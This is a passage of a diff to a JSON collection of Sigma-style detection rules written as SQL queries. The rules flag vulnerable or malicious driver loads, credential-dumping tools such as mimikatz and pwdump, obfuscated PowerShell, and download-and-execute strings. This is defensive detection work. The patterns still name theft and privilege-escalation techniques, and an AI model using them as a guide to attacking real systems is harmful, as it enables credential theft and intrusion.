'06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', 
'50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b'))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the 
load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "title": "Suspicious Driver Load from Temp", + "id": 
"2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", + "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE 
'%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": 
"driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" + ], + "falsepositives": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + ], + "filename": "driver_load_win_mal_poortry_driver.yml" + }, + { + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ 
@@ -2647,214 +2613,196 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": 
"Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = 
'0')" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' 
OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND 
ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": 
"e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": 
"During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' 